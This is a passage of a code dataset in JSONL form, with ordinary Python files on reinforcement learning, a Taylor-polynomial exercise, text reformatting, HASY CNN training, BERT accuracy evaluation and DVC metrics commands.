return r\n\ndef combined_shape(length, shape=None):\n if shape is None:\n return (length,)\n return (length, shape) if np.isscalar(shape) else (length, *shape)\n\ndef multi_task_combined_shape(outer_dim, length, shape=None):\n if shape is None:\n return (outer_dim, length,)\n return (outer_dim, length, shape) if np.isscalar(shape) else (outer_dim, length, *shape)\n\ndef mlp(sizes, activation, output_activation=nn.Identity):\n layers = []\n for j in range(len(sizes)-1):\n act = activation if j < len(sizes)-2 else output_activation\n layers += [nn.Linear(sizes[j], sizes[j+1]), act()]\n return nn.Sequential(*layers)\n\ndef mlp_psp(sizes, activation, num_tasks, psp_type, output_activation=nn.Identity):\n layers = []\n linear_layer = select_linear_layer(psp_type)\n for j in range(len(sizes)-1):\n act = activation if j < len(sizes)-2 else output_activation\n if j == 0:\n layers += [nn.Linear(sizes[j], sizes[j+1]), act()]\n else:\n layers += [linear_layer(sizes[j], sizes[j+1], num_tasks), act()]\n return nn.ModuleList(layers)\n\ndef count_vars(module):\n return sum([np.prod(p.shape) for p in module.parameters()])\n\ndef select_linear_layer(psp_type: str):\n if psp_type == 'Ones':\n linear_layer = OnesHashLinear\n elif psp_type == 'Rand':\n linear_layer = RandHashLinear\n elif psp_type == 'Binary':\n linear_layer = BinaryHashLinear\n #elif psp_type == 'Proposed':\n # linear_layer = ProposedContextLinear\n elif psp_type == 'Sanity':\n linear_layer = SanityCheckLinear\n return linear_layer\n\n\nLOG_STD_MAX = 2\nLOG_STD_MIN = -20\n\nclass SquashedGaussianMLPActor(nn.Module):\n\n def __init__(self, num_tasks, obs_dim, act_dim, hidden_sizes, activation, act_limit, psp_type):\n super().__init__()\n self.activation = activation\n self.net = mlp_psp([obs_dim] + list(hidden_sizes), activation, num_tasks, psp_type, activation)\n linear_layer = select_linear_layer(psp_type)\n self.mu_layer = linear_layer(hidden_sizes[-1], act_dim, num_tasks)\n self.log_std_layer = linear_layer(hidden_sizes[-1], act_dim, num_tasks)\n self.act_limit = act_limit\n self.num_tasks = num_tasks\n\n def forward(self, obs, deterministic=False, with_logprob=True, context=None):\n which_task = torch.argmax(obs[..., -self.num_tasks:], dim=-1).long()\n net_out = obs[..., :-self.num_tasks]\n layer_counter = 0\n for layer in self.net:\n if not hasattr(layer, \"o\"):\n net_out = layer(net_out)\n elif context is None:\n net_out = layer(net_out, which_task)\n else:\n net_out = layer(net_out, context[layer_counter])\n layer_counter += 1\n if context is None:\n mu = self.mu_layer(net_out, which_task)\n log_std = self.log_std_layer(net_out, which_task)\n else:\n mu = self.mu_layer(net_out, context[-2])\n log_std = self.log_std_layer(net_out, context[-1])\n log_std = torch.clamp(log_std, LOG_STD_MIN, LOG_STD_MAX)\n std = torch.exp(log_std)\n\n # Pre-squash distribution and sample\n pi_distribution = Normal(mu, std)\n if deterministic:\n # Only used for evaluating policy at test time.\n pi_action = mu\n else:\n pi_action = pi_distribution.rsample()\n\n if with_logprob:\n # Compute logprob from Gaussian, and then apply correction for Tanh squashing.\n # NOTE: The correction formula is a little bit magic. To get an understanding \n # of where it comes from, check out the original SAC paper (arXiv 1801.01290) \n # and look in appendix C. This is a more numerically-stable equivalent to Eq 21.\n # Try deriving it yourself as a (very difficult) exercise. 
:)\n logp_pi = pi_distribution.log_prob(pi_action).sum(axis=-1)\n logp_pi -= (2*(np.log(2) - pi_action - F.softplus(-2*pi_action))).sum(axis=-1)\n else:\n logp_pi = None\n\n pi_action = torch.tanh(pi_action)\n pi_action = self.act_limit * pi_action\n\n return pi_action, logp_pi\n\nclass MLPQFunction(nn.Module):\n\n def __init__(self, num_tasks, obs_dim, act_dim, hidden_sizes, activation, psp_type):\n super().__init__()\n #self.q = mlp([obs_dim + act_dim] + list(hidden_sizes) + [1], activation)\n psp_type = 'Rand' if psp_type == 'Proposed' else psp_type\n self.q = mlp_psp([obs_dim + act_dim] + list(hidden_sizes) + [1], activation, num_tasks, psp_type)\n self.num_tasks = num_tasks\n self.activation = activation\n\n def forward(self, obs, act):\n which_task = torch.argmax(obs[..., -self.num_tasks:], dim=-1).long()\n q = torch.cat([obs[..., :-self.num_tasks], act], dim=-1)\n for layer in self.q:\n if not hasattr(layer, \"o\"):\n q = layer(q)\n else:\n q = layer(q, which_task)\n #q = self.q(torch.cat([obs, act], dim=-1))\n return torch.squeeze(q, -1) # Critical to ensure q has right shape.\n\nclass ContextGenerator(nn.Module):\n\n def __init__(self, num_tasks, obs_dim, act_dim, hidden_sizes, activation):\n super().__init__()\n proposal_layers = {}\n #proposal_layers['Q1'] = [obs_dim + act_dim] + hidden_sizes + [1]\n #proposal_layers['Q2'] = proposal_layers['Q1']\n #proposal_layers['Pi'] = [obs_dim] + hidden_sizes + [hidden_sizes[-1]] * 2 #mu and log_std\n proposal_layers['Pi'] = [obs_dim] + list(hidden_sizes) + [hidden_sizes[-1]] * 2 #mu and log_std\n #proposal_layers = [obs_dim + act_dim] * 2 # Q functions\n #proposal_layers.extend([obs_dim]) # Pi Function\n #proposal_layers.extend(hidden_sizes * 3) # 3 sets of hidden layers\n #proposal_layers.extend([1] * 2) # Q function action dimensions\n #proposal_layers.extend([hidden_sizes[-1]] * 2) # Mu and Log_Std size\n self.proposal_layers = proposal_layers\n self.num_tasks = num_tasks\n all_layers = [item for item in proposal_layers.values()]\n self.proposal_network = mlp([num_tasks] + list(hidden_sizes) + [np.sum(all_layers)], activation)\n\n def forward(self, obs):\n obs = obs[..., -self.num_tasks:]\n context_layers = self.proposal_network(obs)\n context_map = {'Pi': []}\n prev_shape = 0\n for shape in self.proposal_layers['Pi']:\n context_map['Pi'].append(context_layers[..., prev_shape:prev_shape + shape])\n prev_shape += shape\n return context_map\n\n\nclass MLPActorCritic(nn.Module):\n\n def __init__(self, num_tasks, observation_space, action_space, psp_type, hidden_sizes=(256,256),\n activation=nn.ReLU):\n super().__init__()\n self.num_tasks = num_tasks\n obs_dim = observation_space.shape[0]\n act_dim = action_space.shape[0]\n act_limit = action_space.high[0]\n\n # build policy and value functions\n self.pi = SquashedGaussianMLPActor(num_tasks, obs_dim - num_tasks, act_dim, hidden_sizes, activation, act_limit, psp_type)\n self.q1 = MLPQFunction(num_tasks, obs_dim - num_tasks, act_dim, hidden_sizes, activation, psp_type)\n self.q2 = MLPQFunction(num_tasks, obs_dim - num_tasks, act_dim, hidden_sizes, activation, psp_type)\n\n self.psp_type = psp_type\n ## build context proposal function\n #if psp_type == 'Proposed':\n # self.context_gen = ContextGenerator(num_tasks, obs_dim - num_tasks, act_dim, hidden_sizes, activation)\n\n def act(self, obs, deterministic=False):\n with torch.no_grad():\n if self.psp_type == 'Proposed':\n context_list = self.context_gen(obs)\n a, _ = self.pi(obs.unsqueeze(0), deterministic, False, context=context_list['Pi'])\n 
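            # In the 'Proposed' branch above, context_gen maps the one-hot task
            # suffix of obs to a dict of per-layer context tensors; the 'Pi'
            # entry holds one slice per actor layer width ([obs_dim] +
            # hidden_sizes + the mu/log_std heads), consumed in order by
            # self.pi's forward. Rough shape sketch (sizes illustrative only):
            #   ctx = self.context_gen(obs)   # {'Pi': [t_0, t_1, ...]}
            #   ctx['Pi'][0].shape[-1] == obs_dim - num_tasks   # first-layer slice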
else:\n a, _ = self.pi(obs.unsqueeze(0), deterministic, False)\n return a.squeeze(0).cpu().detach().numpy()\n\n def batched_act(self, obs, deterministic=False):\n with torch.no_grad():\n if self.psp_type == 'Proposed':\n context_list = self.context_gen(obs)\n a, _ = self.pi(obs, deterministic, False, context=context_list['Pi'])\n else:\n a, _ = self.pi(obs, deterministic, False)\n return a.cpu().detach().numpy()","sub_path":"spinup/algos/pytorch/superpos_sac/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":12017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"218955122","text":"import numpy as np\r\nimport sympy as sym\r\nimport math\r\nimport matplotlib.pyplot as plt\r\n\r\nx = sym.Symbol('x')\r\ne =2.7182818284590\r\n##fun = math.log(e,x+1)\r\nfx = sym.cos(x)\r\nmuestras = 51\r\nx0 = -5\r\ngrado = 2 \r\nn = grado + 1 \r\nwhile (x0 < 5):\r\n k = float(0.005)\r\n polinomio = 0\r\n while (k < n):\r\n derivada = fx.diff(x,k)\r\n derivadax0 = derivada.subs(x,x0)\r\n divisor = np.math.factorial(k)\r\n terminok = (derivadax0/divisor)*(x-x0)**k\r\n polinomio = polinomio + terminok\r\n k = k + 1\r\n plt.plot(k, x0)\r\n x0 = x0 + 1\r\nprint(polinomio)","sub_path":"Parcial 1/temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"634197350","text":"from qtlayoutbuilder.lib.line_parser import LineParser\nfrom qtlayoutbuilder.lib.multiline_string_utils import MultilineString\n\n\nclass ReFormatter(object):\n \"\"\"\n This class is able to automatically re-format input text for the builder,\n such that the type-words form a neat aligned column.\n \"\"\"\n\n # Minimum width of the gutter between names and type words.\n _MIN_GUTTER = 6\n\n @classmethod\n def format(cls, one_big_string):\n lines = MultilineString.get_as_left_shifted_lines(one_big_string)\n parsed_lines = [LineParser.parse_line(line) for line in lines]\n\n # First pass is done only to measure the longest (indent + name)\n # section present.\n widest = -1\n for parsed_line in parsed_lines:\n is_a_comment, is_blank, indent, name, type_string, parenthesised = \\\n parsed_line\n if is_a_comment or is_blank:\n continue\n extent = indent + len(name)\n if extent > widest:\n widest = extent\n\n # Second pass reconstitutes the output with the padding necessary\n # to create alignment.\n formatted_lines = []\n for parsed_line, line in zip(parsed_lines, lines):\n is_a_comment, is_blank, indent, name, type_string, parenthesised = \\\n parsed_line\n if is_a_comment or is_blank:\n formatted_lines.append(line)\n continue\n padding_required = widest + cls._MIN_GUTTER - (indent + len(name))\n output_line = ''\n output_line += ' ' * indent\n output_line += name\n output_line += ' ' * padding_required\n output_line += type_string\n if parenthesised:\n output_line += '(%s)' % parenthesised\n formatted_lines.append(output_line)\n return '\\n'.join(formatted_lines)\n","sub_path":"src/qtlayoutbuilder/lib/reformatter.py","file_name":"reformatter.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"634967784","text":"#!/usr/bin/env python\n\n\"\"\"HASY with Tensorflow.\"\"\"\n\nimport input_data\nimport tensorflow as tf\nfrom tensorflow.python.framework import ops\n\nimport os\nimport numpy as np\n\nepochs = 200000\nmodel_checkpoint_path = 
'checkpoints/hasy_tf_model.ckpt'\n\n\ndef weight_variable(shape):\n initial = tf.truncated_normal(shape, stddev=0.1)\n #initial = tf.constant(0.0, shape=shape)\n return tf.get_variable(initializer=initial, name='weights')\n\n\ndef bias_variable(shape):\n initial = tf.constant(0.1, shape=shape)\n return tf.get_variable(initializer=initial, name='biases')\n\n\ndef conv2d(x, W):\n return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')\n\n\ndef max_pool_2x2(x):\n return tf.nn.max_pool(x, ksize=[1, 2, 2, 1],\n strides=[1, 2, 2, 1], padding='SAME')\n\n\ndef eval_network(sess, summary_writer, dataset, correct_prediction, epoch,\n mode, make_summary=False):\n correct_sum = 0\n total_test = 0\n if mode == 'test' and make_summary:\n training_summary = tf.get_default_graph().get_tensor_by_name(\"training_accuracy:0\")\n loss_summary = tf.get_default_graph().get_tensor_by_name(\"loss:0\")\n for i in range(dataset.labels.shape[0] / 1000):\n feed_dict = {x: dataset.images[i * 1000:(i + 1) * 1000],\n y_: dataset.labels[i * 1000:(i + 1) * 1000],\n keep_prob: 1.0}\n\n if mode == 'test' and make_summary:\n [test_correct, train_summ, loss_summ] = sess.run([correct_prediction,\n training_summary,\n loss_summary],\n feed_dict=feed_dict)\n summary_writer.add_summary(train_summ, epoch)\n summary_writer.add_summary(loss_summ, epoch)\n else:\n test_correct = correct_prediction.eval(feed_dict=feed_dict)\n correct_sum += sum(test_correct)\n total_test += len(test_correct)\n return float(correct_sum) / total_test\n\n\ndef log_score(sess, summary_writer, filename, data, scoring, epoch):\n with open(filename, \"a\") as myfile:\n train = eval_network(sess, summary_writer, data.train, scoring, epoch,\n \"train\")\n test = eval_network(sess, summary_writer, data.test, scoring, epoch,\n \"test\")\n myfile.write(\"%i;%0.6f;%0.6f\\n\" % (epoch, train, test))\n\n\ndef get_nonexisting_path(model_checkpoint_path):\n if not os.path.isfile(model_checkpoint_path):\n return model_checkpoint_path\n else:\n folder = os.path.dirname(model_checkpoint_path)\n filename = os.path.basename(model_checkpoint_path)\n filename, ext = os.path.splitext(filename)\n i = 1\n gen_filename = os.path.join(folder, \"%s-%i%s\" % (filename, i, ext))\n while os.path.isfile(gen_filename):\n i += 1\n gen_filename = os.path.join(folder, \"%s-%i%s\" % (filename, i, ext))\n return gen_filename\n\n\nhasy = input_data.read_data_sets('HASYv2', one_hot=True)\n\nwith tf.Session() as sess:\n x = tf.placeholder(tf.float32, shape=[None, 1024])\n y_ = tf.placeholder(tf.float32, shape=[None, 369])\n x_image = tf.reshape(x, [-1, 32, 32, 1])\n\n with tf.variable_scope('conv1') as scope:\n W_conv1 = weight_variable([5, 5, 1, 32])\n b_conv1 = bias_variable([32])\n h_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1, name='ReLU1')\n h_pool1 = max_pool_2x2(h_conv1)\n\n with tf.variable_scope('conv2') as scope:\n W_conv2 = weight_variable([5, 5, 32, 32])\n b_conv2 = bias_variable([32])\n h_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2, name='ReLU2')\n h_pool2 = max_pool_2x2(h_conv2)\n\n with tf.variable_scope('fc1'):\n W_fc1 = weight_variable([8 * 8 * 32, 1000])\n b_fc1 = bias_variable([1000])\n\n h_pool2_flat = tf.reshape(h_pool2, [-1, 8 * 8 * 32])\n h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)\n\n with tf.variable_scope('dropout'):\n keep_prob = tf.placeholder(tf.float32)\n h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)\n\n with tf.variable_scope('softmax'):\n W_fc2 = weight_variable([1000, 369])\n b_fc2 = bias_variable([369])\n\n y_conv = 
tf.nn.softmax(tf.matmul(h_fc1_drop, W_fc2) + b_fc2)\n\n # for op in y_conv.get_operations():\n # flops = ops.get_stats_for_node_def(g, op.node_def, 'flops').value\n # print(\"FLOPS: %s\" % str(flops))\n\n total_parameters = 0\n for variable in tf.trainable_variables():\n # shape is an array of tf.Dimension\n shape = variable.get_shape()\n print(\" shape: %s\" % str(shape))\n variable_parametes = 1\n for dim in shape:\n variable_parametes *= dim.value\n print(\" variable_parametes: %i\" % variable_parametes)\n total_parameters += variable_parametes\n print(\" ---\")\n print(\"total_parameters: %i\" % total_parameters)\n\n cross_entropy = tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(y_conv + 10**(-7)),\n reduction_indices=[1]))\n train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)\n correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(y_, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n tf.summary.scalar(\"training_accuracy\", accuracy)\n tf.summary.scalar(\"loss\", cross_entropy)\n\n # Add ops to save and restore all the variables.\n saver = tf.train.Saver()\n summary_writer = tf.summary.FileWriter('summary_dir', sess.graph)\n\n sess.run(tf.global_variables_initializer())\n model_checkpoint_path = get_nonexisting_path(model_checkpoint_path)\n validation_curve_path = get_nonexisting_path('validation-curves/validation'\n '-curve-accuracy.csv')\n print(\"model_checkpoint_path: %s\" % model_checkpoint_path)\n print(\"validation_curve_path: %s\" % validation_curve_path)\n if not os.path.isfile(model_checkpoint_path):\n for i in range(epochs):\n batch = hasy.train.next_batch(50)\n if i % 100 == 0:\n log_score(sess, summary_writer,\n validation_curve_path,\n hasy, correct_prediction, i)\n train_step.run(feed_dict={x: batch[0],\n y_: batch[1],\n keep_prob: 0.5})\n\n log_score(sess, summary_writer, validation_curve_path,\n hasy, correct_prediction, epochs)\n\n # Save the variables to disk.\n save_path = saver.save(sess, model_checkpoint_path)\n print(\"Model saved in file: %s\" % save_path)\n else:\n saver.restore(sess, model_checkpoint_path)\n print(\"Model restored.\")\n # Export the conv1 features\n with tf.variable_scope('conv1', reuse=True) as scope_conv:\n W_conv1 = tf.get_variable('weights', shape=[5, 5, 1, 32])\n weights = W_conv1.eval()\n with open(\"conv1.weights.npz\", \"w\") as outfile:\n np.save(outfile, weights)\n\n # TODO\n for i in range(hasy.train.labels.shape[0] / 1000):\n feed_dict = {x: hasy.train.images[i * 1000:(i + 1) * 1000],\n y_: hasy.train.labels[i * 1000:(i + 1) * 1000],\n keep_prob: 1.0}\n test_correct = correct_prediction.eval(feed_dict=feed_dict)\n\n summary_writer.flush()\n summary_writer.close()\n","sub_path":"ML/hasy/tf_hasy.py","file_name":"tf_hasy.py","file_ext":"py","file_size_in_byte":7586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"85263338","text":"#! /usr/bin/env python3\n# Copyright (c) 2020, NVIDIA CORPORATION. 
All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os, sys\nsys.path.insert(0, os.getcwd())\n\nimport argparse\nimport collections\nimport json\nimport numpy as np\n\nfrom code.bert.tensorrt.evaluate import f1_score, exact_match_score\nfrom code.bert.tensorrt.helpers.data_processing import get_predictions, read_squad_json, convert_example_to_features\nfrom code.bert.tensorrt.helpers.tokenization import BertTokenizer\nfrom code.common import logging\n\n_NetworkOutput = collections.namedtuple(\"NetworkOutput\", [\"start_logits\", \"end_logits\", \"feature_index\"])\n\ndef get_score(predictions):\n\n logging.info(\"Evaluating predictions...\")\n\n input_file = \"build/data/squad/dev-v1.1.json\"\n\n with open(input_file) as f:\n data = json.load(f)[\"data\"]\n\n f1_score_total = 0.0\n exact_score_total = 0.0\n sample_idx = 0\n for task in data:\n title = task[\"title\"]\n for paragraph_idx, paragraph in enumerate(task[\"paragraphs\"]):\n context = paragraph[\"context\"]\n for q_idx, qas in enumerate(paragraph[\"qas\"]):\n if sample_idx < len(predictions):\n answers = qas[\"answers\"]\n f1_score_this = 0.0\n exact_score_this = 0.0\n for answer in answers:\n f1_score_this = max(f1_score_this, f1_score(predictions[sample_idx], answer[\"text\"]))\n exact_score_this = max(exact_score_this, exact_match_score(predictions[sample_idx], answer[\"text\"]))\n f1_score_total += f1_score_this\n exact_score_total += exact_score_this\n sample_idx += 1\n\n f1_score_avg = f1_score_total / len(predictions) * 100\n exact_score_avg = exact_score_total / len(predictions) * 100\n\n return (exact_score_avg, f1_score_avg)\n\ndef evaluate(log_path, squad_path):\n logging.info(\"Creating tokenizer...\")\n tokenizer = BertTokenizer(\"build/models/bert/vocab.txt\")\n logging.info(\"Done creating tokenizer.\")\n\n logging.info(\"Reading SQuAD examples...\")\n eval_examples = read_squad_json(squad_path)\n logging.info(\"Done reading SQuAD examples.\")\n\n logging.info(\"Converting examples to features...\")\n max_seq_length = 384\n max_query_length = 64\n doc_stride = 128\n eval_features = []\n num_features_per_example = []\n for example_idx, example in enumerate(eval_examples):\n feature = convert_example_to_features(example.doc_tokens, example.question_text,\n tokenizer, max_seq_length, doc_stride, max_query_length)\n eval_features.extend(feature)\n num_features_per_example.append(len(feature))\n logging.info(\"Done converting examples to features.\")\n\n logging.info(\"Collecting LoadGen results...\")\n with open(log_path) as f:\n log_predictions = json.load(f)\n score_total = 0.0\n results = [None for i in range(len(eval_features))]\n\n logits_padded = np.zeros((max_seq_length, 2), dtype=np.float16)\n for prediction in log_predictions:\n qsl_idx = prediction[\"qsl_idx\"]\n assert qsl_idx < len(eval_features), \"qsl_idx exceeds total number of features\"\n\n data = np.frombuffer(bytes.fromhex(prediction[\"data\"]), np.float16)\n data = data.reshape(-1, 2)\n seq_len = data.shape[0]\n 
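            # The fill below re-primes the reusable buffer with -10000.0 so that
            # positions past seq_len behave like log(0): they cannot win the
            # start/end argmax or contribute mass under softmax during span
            # scoring. One-shot equivalent sketch (commented out; np.full here
            # is an illustration, not the original code):
            #   start = np.full(max_seq_length, -10000.0, dtype=np.float16)
            #   start[:seq_len] = data[:, 0]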
logits_padded.fill(-10000.0)\n logits_padded[:seq_len, :] = data\n start_logits = logits_padded[:,0].copy()\n end_logits = logits_padded[:,1].copy()\n results[qsl_idx] = _NetworkOutput(start_logits=start_logits, end_logits=end_logits, feature_index=qsl_idx)\n logging.info(\"Done collecting LoadGen results.\")\n\n logging.info(\"Evaluating results...\")\n predictions = []\n feature_idx = 0\n # Total number of n-best predictions to generate in the nbest_predictions.json output file\n n_best_size = 20\n # The maximum length of an answer that can be generated. This is needed\n # because the start and end predictions are not conditioned on one another\n max_answer_length = 30\n for example_idx, example in enumerate(eval_examples):\n results_per_example = []\n for i in range(num_features_per_example[example_idx]):\n results_per_example.append(results[feature_idx])\n feature_idx += 1\n\n prediction, _, _ = get_predictions(example.doc_tokens, eval_features, results_per_example, n_best_size, max_answer_length)\n predictions.append(prediction)\n\n exact_score, f1_score = get_score(predictions)\n print(\"{{\\\"exact_match\\\": {:.3f}, \\\"f1\\\": {:.3f}}}\".format(exact_score, f1_score))\n\ndef main():\n parser = argparse.ArgumentParser(\"Accuracy checker for BERT benchmark from LoadGen logs\")\n parser.add_argument(\"--mlperf-accuracy-file\", help=\"Path to LoadGen log produced in AccuracyOnly mode\")\n parser.add_argument(\"--squad-val-file\", help=\"Path to SQuAD 1.1 json file\", default=\"build/data/squad/dev-v1.1.json\")\n args = parser.parse_args()\n evaluate(args.mlperf_accuracy_file, args.squad_val_file)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"closed/Cisco/code/bert-99/tensorrt/accuracy-bert.py","file_name":"accuracy-bert.py","file_ext":"py","file_size_in_byte":5606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"87617987","text":"import argparse\nimport logging\n\nfrom dvc.command import completion\nfrom dvc.command.base import CmdBase, append_doc_link, fix_subparsers\nfrom dvc.exceptions import BadMetricError, DvcException\n\nlogger = logging.getLogger(__name__)\n\n\nDEFAULT_PRECISION = 5\n\n\ndef _show_metrics(\n metrics,\n markdown=False,\n all_branches=False,\n all_tags=False,\n all_commits=False,\n precision=None,\n):\n from dvc.utils.diff import format_dict, table\n from dvc.utils.flatten import flatten\n\n # When `metrics` contains a `None` key, it means that some files\n # specified as `targets` in `repo.metrics.show` didn't contain any metrics.\n missing = metrics.pop(None, None)\n with_rev = any([all_branches, all_tags, all_commits])\n header_set = set()\n rows = []\n\n if precision is None:\n precision = DEFAULT_PRECISION\n\n def _round(val):\n if isinstance(val, float):\n return round(val, precision)\n return val\n\n for _branch, val in metrics.items():\n for _fname, metric in val.items():\n if not isinstance(metric, dict):\n header_set.add(\"\")\n continue\n for key, _val in flatten(format_dict(metric)).items():\n header_set.add(key)\n header = sorted(header_set)\n for branch, val in metrics.items():\n for fname, metric in val.items():\n row = []\n if with_rev:\n row.append(branch)\n row.append(fname)\n if not isinstance(metric, dict):\n row.append(str(metric))\n rows.append(row)\n continue\n flattened_val = flatten(format_dict(metric))\n\n for i in header:\n row.append(_round(flattened_val.get(i)))\n rows.append(row)\n header.insert(0, \"Path\")\n if with_rev:\n header.insert(0, \"Revision\")\n\n if 
missing:\n raise BadMetricError(missing)\n return table(header, rows, markdown)\n\n\nclass CmdMetricsBase(CmdBase):\n UNINITIALIZED = True\n\n\nclass CmdMetricsShow(CmdMetricsBase):\n def run(self):\n try:\n metrics = self.repo.metrics.show(\n self.args.targets,\n all_branches=self.args.all_branches,\n all_tags=self.args.all_tags,\n all_commits=self.args.all_commits,\n recursive=self.args.recursive,\n )\n\n if self.args.show_json:\n import json\n\n logger.info(json.dumps(metrics))\n else:\n table = _show_metrics(\n metrics,\n self.args.show_md,\n self.args.all_branches,\n self.args.all_tags,\n self.args.all_commits,\n self.args.precision,\n )\n if table:\n logger.info(table)\n except DvcException:\n logger.exception(\"\")\n return 1\n\n return 0\n\n\ndef _show_diff(diff, markdown=False, no_path=False, precision=None):\n from collections import OrderedDict\n\n from dvc.utils.diff import table\n\n if precision is None:\n precision = DEFAULT_PRECISION\n\n def _round(val):\n if isinstance(val, float):\n return round(val, precision)\n\n return val\n\n rows = []\n for fname, mdiff in diff.items():\n sorted_mdiff = OrderedDict(sorted(mdiff.items()))\n for metric, change in sorted_mdiff.items():\n row = [] if no_path else [fname]\n row.append(metric)\n row.append(_round(change.get(\"old\")))\n row.append(_round(change[\"new\"]))\n row.append(_round(change.get(\"diff\")))\n rows.append(row)\n\n header = [] if no_path else [\"Path\"]\n header.append(\"Metric\")\n header.extend([\"Old\", \"New\"])\n header.append(\"Change\")\n\n return table(header, rows, markdown)\n\n\nclass CmdMetricsDiff(CmdMetricsBase):\n def run(self):\n try:\n diff = self.repo.metrics.diff(\n a_rev=self.args.a_rev,\n b_rev=self.args.b_rev,\n targets=self.args.targets,\n recursive=self.args.recursive,\n all=self.args.all,\n )\n\n if self.args.show_json:\n import json\n\n logger.info(json.dumps(diff))\n else:\n table = _show_diff(\n diff,\n self.args.show_md,\n self.args.no_path,\n precision=self.args.precision,\n )\n if table:\n logger.info(table)\n\n except DvcException:\n logger.exception(\"failed to show metrics diff\")\n return 1\n\n return 0\n\n\ndef add_parser(subparsers, parent_parser):\n METRICS_HELP = \"Commands to display and compare metrics.\"\n\n metrics_parser = subparsers.add_parser(\n \"metrics\",\n parents=[parent_parser],\n description=append_doc_link(METRICS_HELP, \"metrics\"),\n help=METRICS_HELP,\n formatter_class=argparse.RawDescriptionHelpFormatter,\n )\n\n metrics_subparsers = metrics_parser.add_subparsers(\n dest=\"cmd\",\n help=\"Use `dvc metrics CMD --help` to display command-specific help.\",\n )\n\n fix_subparsers(metrics_subparsers)\n\n METRICS_SHOW_HELP = \"Print metrics, with optional formatting.\"\n metrics_show_parser = metrics_subparsers.add_parser(\n \"show\",\n parents=[parent_parser],\n description=append_doc_link(METRICS_SHOW_HELP, \"metrics/show\"),\n help=METRICS_SHOW_HELP,\n formatter_class=argparse.RawDescriptionHelpFormatter,\n )\n metrics_show_parser.add_argument(\n \"targets\",\n nargs=\"*\",\n help=(\n \"Limit command scope to these metrics files. 
Using -R, \"\n \"directories to search metrics files in can also be given.\"\n ),\n ).complete = completion.FILE\n metrics_show_parser.add_argument(\n \"-a\",\n \"--all-branches\",\n action=\"store_true\",\n default=False,\n help=\"Show metrics for all branches.\",\n )\n metrics_show_parser.add_argument(\n \"-T\",\n \"--all-tags\",\n action=\"store_true\",\n default=False,\n help=\"Show metrics for all tags.\",\n )\n metrics_show_parser.add_argument(\n \"-A\",\n \"--all-commits\",\n action=\"store_true\",\n default=False,\n help=\"Show metrics for all commits.\",\n )\n metrics_show_parser.add_argument(\n \"--show-json\",\n action=\"store_true\",\n default=False,\n help=\"Show output in JSON format.\",\n )\n metrics_show_parser.add_argument(\n \"--show-md\",\n action=\"store_true\",\n default=False,\n help=\"Show tabulated output in the Markdown format (GFM).\",\n )\n metrics_show_parser.add_argument(\n \"-R\",\n \"--recursive\",\n action=\"store_true\",\n default=False,\n help=(\n \"If any target is a directory, recursively search and process \"\n \"metrics files.\"\n ),\n )\n metrics_show_parser.add_argument(\n \"--precision\",\n type=int,\n help=(\n \"Round metrics to `n` digits precision after the decimal point. \"\n f\"Rounds to {DEFAULT_PRECISION} digits by default.\"\n ),\n metavar=\"\",\n )\n metrics_show_parser.set_defaults(func=CmdMetricsShow)\n\n METRICS_DIFF_HELP = (\n \"Show changes in metrics between commits in the DVC repository, or \"\n \"between a commit and the workspace.\"\n )\n metrics_diff_parser = metrics_subparsers.add_parser(\n \"diff\",\n parents=[parent_parser],\n description=append_doc_link(METRICS_DIFF_HELP, \"metrics/diff\"),\n help=METRICS_DIFF_HELP,\n formatter_class=argparse.RawDescriptionHelpFormatter,\n )\n metrics_diff_parser.add_argument(\n \"a_rev\", nargs=\"?\", help=\"Old Git commit to compare (defaults to HEAD)\"\n )\n metrics_diff_parser.add_argument(\n \"b_rev\",\n nargs=\"?\",\n help=\"New Git commit to compare (defaults to the current workspace)\",\n )\n metrics_diff_parser.add_argument(\n \"--targets\",\n nargs=\"*\",\n help=(\n \"Specific metrics file(s) to compare \"\n \"(even if not found as `metrics` in `dvc.yaml`). \"\n \"Using -R, directories to search metrics files in \"\n \"can also be given.\"\n \"Shows all tracked metrics by default.\"\n ),\n metavar=\"\",\n ).complete = completion.FILE\n metrics_diff_parser.add_argument(\n \"-R\",\n \"--recursive\",\n action=\"store_true\",\n default=False,\n help=(\n \"If any target is a directory, recursively search and process \"\n \"metrics files.\"\n ),\n )\n metrics_diff_parser.add_argument(\n \"--all\",\n action=\"store_true\",\n default=False,\n help=\"Show unchanged metrics as well.\",\n )\n metrics_diff_parser.add_argument(\n \"--show-json\",\n action=\"store_true\",\n default=False,\n help=\"Show output in JSON format.\",\n )\n metrics_diff_parser.add_argument(\n \"--show-md\",\n action=\"store_true\",\n default=False,\n help=\"Show tabulated output in the Markdown format (GFM).\",\n )\n metrics_diff_parser.add_argument(\n \"--no-path\",\n action=\"store_true\",\n default=False,\n help=\"Don't show metric path.\",\n )\n metrics_diff_parser.add_argument(\n \"--precision\",\n type=int,\n help=(\n \"Round metrics to `n` digits precision after the decimal point. 
